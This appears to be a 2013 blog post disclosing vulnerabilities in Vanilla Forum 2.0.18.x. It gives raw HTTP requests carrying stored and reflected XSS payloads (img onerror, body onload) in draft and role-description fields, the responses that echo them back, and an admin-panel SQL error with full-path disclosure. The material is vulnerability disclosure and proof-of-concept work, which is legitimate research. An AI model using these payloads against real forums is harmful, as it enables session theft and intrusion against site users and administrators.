I found an interesting 0day vulnerability in Vanilla Forum.
Below is the screen with the vulnerable parameter.
As I saw durning information gathering, here is another one
SQL Injection vulnerability, so it is a similar story.
(This time) this bug can be reproducet in 2.0.18.4 and 2.0.18.8 version.
Check it out:
Proof of concept will not be public right now.
* Update (after 1h) *
After some code review I found that in admin panel we have also SQL Injection
vulnerability. Beside, a lots of XSS (stored/reflected, whatever).
* Update 19.07.2013 *
Below you'll find a description of few other vulnerabilities found in this (latest)
version of Vanilla Forum.
- XSS when adding new discusion
---< code >---
POST /vc/index.php?p=/post/discussion HTTP/1.1
Host: 192.168.255.105
(...)
Cache-Control: no-cache
Discussion%2FTransientKey=DTUVYD8CV0SF&Discussion%2Fhpt=
&Discussion%2FDiscussionID=&Discussion%2FDraftID='"<img+src=x%20onerror=alert(1)>
&Discussion%2FName=asdasdasd&Discussion%2FCategoryID=1&Discussion%2FBody=
asdasdasdasdasdasd&Checkboxes%5B%5D=Announce&Checkboxes%5B%5D=
Closed&DeliveryType=VIEW&DeliveryMethod=JSON&Discussion/Post_Discussion=Post Discussion
---< code >---
After this request you will see response contains XSS code:
---< code >---
{"DiscussionID":"77","DraftID":"'\"<img src=x
onerror=alert(1)>","FormSaved":true,"DeliveryType":"VIEW","Data":"PGRpdiWRk(...)
---< code >---
- Another XSS - this time in comments:
---< code >---
POST /vc/index.php?p=/vanilla/post/comment/1 HTTP/1.1
Host: 192.168.255.105
(...)
Cache-Control: no-cache
Comment%2FTransientKey=DTUVYD8CV0SF&Comment%2Fhpt=
&Comment%2FDiscussionID=1&Comment%2FCommentID=
&Comment%2FDraftID='"`<img%20src=x%20onerror=alert(2)>
&Comment%2FBody=asdasdasdasdasdasd&DeliveryType=VIEW
&DeliveryMethod=JSON&Type=Post&Comment/LastCommentID=0
---< code >---
And response:
---< code >---
Ajax"}],"CommentID":"131","DraftID":"'\"`<img src=x onerror=alert(2)>","MyDrafts":"My Drafts",
"CountDrafts":0,"FormSaved":true,"DeliveryType":"VIEW","Data":"PGRpdiBjbGFzczAg(...)
---< code >---
- Nice persistent XSS - when editing roles ('description' is vulnerable):
Response for this one:
---< code >---
(...)
<strong>Guest</strong>
<div>
<a href="/vc/index.php?p=/role/edit/2" class="SmallButton">Edit</a> </div>
</td>
<td class="Alt">'>"><body onload=alert(/4321/)></td>
</tr>
<tr id="4" class="Alt">
(...)
---< code >---
Another SQL Injection bug - this time located in admin panel:
---< code >---
POST /vc/index.php?p=/dashboard/settings/bans&Page=11111111111111111111111& HTTP/1.1
Host: 192.168.255.105
(...)
Connection: close
DeliveryType=VIEW
---< code >---
Check the response:
---< code >---
HTTP/1.1 500 Internal Server Error
Date: Wed, 17 Jul 2013 13:10:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Length: 1633
Connection: close
Content-Type: text/html; charset=utf-8
<h1>FATAL ERROR IN: Gdn_Database.Query();</h1>
<div class="AjaxError">"You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to
use near '2.2222222222222E+23, 20' at line 5"
select Ban.*, iu.Name as `InsertName`
from GDN_Ban Ban
left join GDN_User iu on Ban.InsertUserID = iu.UserID
order by BanType, BanValue asc
limit 2.2222222222222E+23, 20
LOCATION: /var/www/vc/library/database/class.database.php
> 283: $PDOStatement = $this->Connection()->query($Sql);
> 284: }
> 285:
> 286: if ($PDOStatement === FALSE) {
>>> 287: trigger_error(ErrorMessage($this->GetPDOErrorMessage($this->Connection()->errorInfo()), $this->ClassName, 'Query', $Sql), E_USER_ERROR);
> 288: }
> 289:
> 290: // Did this query modify data in any way?
> 291: if ($ReturnType == 'ID') {
BACKTRACE:
[/var/www/vc/library/database/class.database.php] PHP::Gdn_ErrorHandler();
[/var/www/vc/library/database/class.database.php 287] PHP::trigger_error();
[/var/www/vc/library/database/class.sqldriver.php 1657] Gdn_Database->Query();
[/var/www/vc/library/database/class.sqldriver.php 941] Gdn_SQLDriver->Query();
[/var/www/vc/library/core/class.model.php 383] Gdn_SQLDriver->GetWhere();
[/var/www/vc/applications/dashboard/controllers/class.settingscontroller.php 275] Gdn_Model->GetWhere();
[/var/www/vc/applications/dashboard/controllers/class.settingscontroller.php 275] SettingsController->Bans();
[/var/www/vc/library/core/class.dispatcher.php 322] PHP::call_user_func_array();
[/var/www/vc/index.php 53] Gdn_Dispatcher->Dispatch();
</div>
---< code >---
So as you can see we have here also information disclosure bug,
because attacker will see full path to Vanilla-instalation.
If you have any questions, or want to test your web/infrastructure,
just mail me your question(s). I will answer ASAP.
Enjoy ;)
this article is very helpful to me. Thanks Lovely admin :) .
ReplyDeleteSQL Injection